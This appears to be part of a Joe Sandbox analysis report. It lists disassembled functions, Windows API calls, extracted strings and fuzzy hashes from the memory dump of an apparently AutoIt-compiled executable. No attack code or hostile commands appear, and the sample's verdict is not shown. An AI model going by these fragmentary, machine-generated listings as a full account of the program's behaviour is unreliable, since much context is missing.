                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: 852b684137c8f689fa18011d011a123e3318819a1c78099ad33ff407fa66c25b
                                                  • Instruction ID: 57a8685998c1e35587d5f6362b96a5b712d499ca6f3cf83d77d26acc14240824
                                                  • Opcode Fuzzy Hash: 852b684137c8f689fa18011d011a123e3318819a1c78099ad33ff407fa66c25b
                                                  • Instruction Fuzzy Hash: 8DD05EE41226383BEC2C0728BD4BF7A1109F3C0781F84814A7251858C0E8E09900A434
                                                  Function 00C187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C18389), ref: 00C187D1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: 5d13ef961428fad85332d44db11afe03f79775323aa8270d6b8fea5d70927550
                                                  • Instruction ID: 396764f437392f9429ce73bf058ffa8c141abeb6650cb8e73f3ad023a3b50a2c
                                                  • Opcode Fuzzy Hash: 5d13ef961428fad85332d44db11afe03f79775323aa8270d6b8fea5d70927550
                                                  • Instruction Fuzzy Hash: 33D05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                                                  Function 00BEA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BEA12A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 39ecefa22fd26945303de5e65f9593f05f75a2a374e5fec9d544b83b10c9c93a
                                                  • Instruction ID: 27a0fab0cc3d293221672f9a87339bfaf10f7f98e80291caed329aca23331d3d
                                                  • Opcode Fuzzy Hash: 39ecefa22fd26945303de5e65f9593f05f75a2a374e5fec9d544b83b10c9c93a
                                                  • Instruction Fuzzy Hash: D3A0113000020CAB8A002F82EC08A88BFACEA02AA0B008020F80C800328B32A8228A80
                                                  Function 00BD8808 Relevance: .6, Instructions: 590COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 708876ffe5ecd6e163e90dc4aff0bbaccd626aa5495becaed74423dfb505f9e3
                                                  • Instruction ID: 62ce67539869300a86a2cef3b8de2ebe2b6813fbe2ded0063b573e2c10165780
                                                  • Opcode Fuzzy Hash: 708876ffe5ecd6e163e90dc4aff0bbaccd626aa5495becaed74423dfb505f9e3
                                                  • Instruction Fuzzy Hash: 33223731504506CBDF388A64C4A47BCF7E1FF82305F6880ABD5968B692FB749ED1E681
                                                  Function 00BE21C5 Relevance: .3, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 6ae5da1243041a582370c3b33aa4084ff1f46b1ff28b03eac8eb3acb84ca7a34
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 11C150322051D30ADB2D473F887503EBBE59EA27B131A47ADD8B2DB1D4EF20C965D620
                                                  Function 00BE25FA Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: aa49e43d14973e8d1a6261728a04decfdf2f0caee2759d211bd9e088282c8902
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 96C18D362051D30ADF2D473F887403EBAE59EA27B132A17EDD4B2DB1D5EF20C9649620
                                                  Function 00BE1978 Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 5e6666cc57f443223a95ad04bd00b4300192f8f6d61adb5a927ddbca79d7f125
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: FFC14D322051D309DB2D463F887413EBAE1DEA27B132A5BADD4B2DB1D5EF30C9659620
                                                  Function 00C4356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00C4F910), ref: 00C43627
                                                  • IsWindowVisible.USER32(?), ref: 00C4364B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: 34a98e27d988ca12a2e60fe350811d31eddae7c317f2394ee450d379459c8f15
                                                  • Instruction ID: 357b9527abc4f0f863cfef2d8186245dc4bc19a7f9435f6d91ae007f1414017e
                                                  • Opcode Fuzzy Hash: 34a98e27d988ca12a2e60fe350811d31eddae7c317f2394ee450d379459c8f15
                                                  • Instruction Fuzzy Hash: 85D18E702183419BDB04EF11C455AAEB7E1FF95394F1484A8F8965B3E2CB31EE8ADB41
                                                  Function 00C4A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C4A630
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C4A661
                                                  • GetSysColor.USER32(0000000F), ref: 00C4A66D
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00C4A687
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4A696
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A6C1
                                                  • GetSysColor.USER32(00000010), ref: 00C4A6C9
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00C4A6D0
                                                  • FrameRect.USER32(?,?,00000000), ref: 00C4A6DF
                                                  • DeleteObject.GDI32(00000000), ref: 00C4A6E6
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00C4A731
                                                  • FillRect.USER32(?,?,00000000), ref: 00C4A763
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4A78E
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(00000012), ref: 00C4A903
                                                    • Part of subcall function 00C4A8CA: SetTextColor.GDI32(?,?), ref: 00C4A907
                                                    • Part of subcall function 00C4A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C4A91D
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(0000000F), ref: 00C4A928
                                                    • Part of subcall function 00C4A8CA: GetSysColor.USER32(00000011), ref: 00C4A945
                                                    • Part of subcall function 00C4A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4A953
                                                    • Part of subcall function 00C4A8CA: SelectObject.GDI32(?,00000000), ref: 00C4A964
                                                    • Part of subcall function 00C4A8CA: SetBkColor.GDI32(?,00000000), ref: 00C4A96D
                                                    • Part of subcall function 00C4A8CA: SelectObject.GDI32(?,?), ref: 00C4A97A
                                                    • Part of subcall function 00C4A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A999
                                                    • Part of subcall function 00C4A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4A9B0
                                                    • Part of subcall function 00C4A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C4A9C5
                                                    • Part of subcall function 00C4A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4A9ED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 3521893082-0
                                                  • Opcode ID: f91dcaaad30b2e45830027fa6e55c22a920c9efca02367bac578912a90d34906
                                                  • Instruction ID: c7b45090f90a1fbef4b566e17cd7aa235d759602cbc39a57b751bea30d47335e
                                                  • Opcode Fuzzy Hash: f91dcaaad30b2e45830027fa6e55c22a920c9efca02367bac578912a90d34906
                                                  • Instruction Fuzzy Hash: 22917976408301AFD7109F64DC08B5FBBB9FB8A321F100A2DF9A2961A1D771D946CB52
                                                  Function 00BC2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00BC2CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00BC2CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00BC2CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00BC2CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00BC2D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BFC43B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BFC474
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BFC89D
                                                    • Part of subcall function 00BC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC2036,?,00000000,?,?,?,?,00BC16CB,00000000,?), ref: 00BC1B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00BFC8DA
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BFC8F1
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFC907
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BFC912
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: 648b46023ccd1210568ffd9fe1a472415ee75d34b19b532d02247d86b3fd05d8
                                                  • Instruction ID: f1b63433a776355080f76dceb20fe11505e01471a7f5302961663c23d47dd331
                                                  • Opcode Fuzzy Hash: 648b46023ccd1210568ffd9fe1a472415ee75d34b19b532d02247d86b3fd05d8
                                                  • Instruction Fuzzy Hash: 3F127C34604209EFDB159F24C985BBABBE1FF45300F5445ADE659CB262CB31EC8ACB91
                                                  Function 00C374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00C374DE
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C3759D
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C375DB
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C375ED
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C37633
                                                  • GetClientRect.USER32(00000000,?), ref: 00C3763F
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C37683
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C37692
                                                  • GetStockObject.GDI32(00000011), ref: 00C376A2
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C376A6
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C376B6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C376BF
                                                  • DeleteDC.GDI32(00000000), ref: 00C376C8
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C376F4
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C3770B
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C37746
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C3775A
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C3776B
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C3779B
                                                  • GetStockObject.GDI32(00000011), ref: 00C377A6
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C377B1
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C377BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 51fc78a371628a63de8ed95ddee236e3921edb125bf2f8db02da4abb5788b3a1
                                                  • Instruction ID: 1667205d5b4b31fe518bd6330662f1c37dc8f6d6c58674b75ac939437bab80e7
                                                  • Opcode Fuzzy Hash: 51fc78a371628a63de8ed95ddee236e3921edb125bf2f8db02da4abb5788b3a1
                                                  • Instruction Fuzzy Hash: 85A165B5A40615BFEB14DBA4DC49FAE7BB9FB09710F004158FA15A72E0CBB0AD01CB64
                                                  Function 00C2AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2AD1E
                                                  • GetDriveTypeW.KERNEL32(?,00C4FAC0,?,\\.\,00C4F910), ref: 00C2ADFB
                                                  • SetErrorMode.KERNEL32(00000000,00C4FAC0,?,\\.\,00C4F910), ref: 00C2AF59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: a3fa8632f312f80a0e8df5987a6e0bce0efdd7f62dd19f73635a8af02bc09569
                                                  • Instruction ID: f98a436823c05f58547656b6181422de7878aba3f1577249b5009b5dc38071b2
                                                  • Opcode Fuzzy Hash: a3fa8632f312f80a0e8df5987a6e0bce0efdd7f62dd19f73635a8af02bc09569
                                                  • Instruction Fuzzy Hash: 6551D7B1684215EBCB10DB51EE46DBD73A1EB08710B20806BF51BA7A90CF749E07EB53
                                                  Function 00BC68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: b7f7cfa5a8ca66bf13c6c188f9ebcc3dffd2a73ae8b200abf79ef42577e1c260
                                                  • Instruction ID: bbacb508b6857e5e5c25a9eba5177eaba0339c490c66c2e5a9d314b81eaa1f49
                                                  • Opcode Fuzzy Hash: b7f7cfa5a8ca66bf13c6c188f9ebcc3dffd2a73ae8b200abf79ef42577e1c260
                                                  • Instruction Fuzzy Hash: F081F9B16402096ACB21AA61DC87FBE37E8EF09700F1440BCF905AB192EBB0DE45D665
                                                  Function 00C49A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C49AD2
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C49B8B
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C49BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: a12944eaadd9eda098627494dbf399f36c7b1fad0b24c8d5f50cd2f1addd7edb
                                                  • Instruction ID: 0323dd1e8200e3440721821d4cbeda78098956ce90ee3dc65d52a89017530131
                                                  • Opcode Fuzzy Hash: a12944eaadd9eda098627494dbf399f36c7b1fad0b24c8d5f50cd2f1addd7edb
                                                  • Instruction Fuzzy Hash: 8202F130104321AFEB25CF25C889BABBBE5FF49314F04852DF9A9D62A1C774DA45CB52
                                                  Function 00C4A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00C4A903
                                                  • SetTextColor.GDI32(?,?), ref: 00C4A907
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C4A91D
                                                  • GetSysColor.USER32(0000000F), ref: 00C4A928
                                                  • CreateSolidBrush.GDI32(?), ref: 00C4A92D
                                                  • GetSysColor.USER32(00000011), ref: 00C4A945
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C4A953
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4A964
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C4A96D
                                                  • SelectObject.GDI32(?,?), ref: 00C4A97A
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C4A999
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C4A9B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C4A9C5
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4A9ED
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C4AA14
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00C4AA32
                                                  • DrawFocusRect.USER32(?,?), ref: 00C4AA3D
                                                  • GetSysColor.USER32(00000011), ref: 00C4AA4B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C4AA53
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C4AA67
                                                  • SelectObject.GDI32(?,00C4A5FA), ref: 00C4AA7E
                                                  • DeleteObject.GDI32(?), ref: 00C4AA89
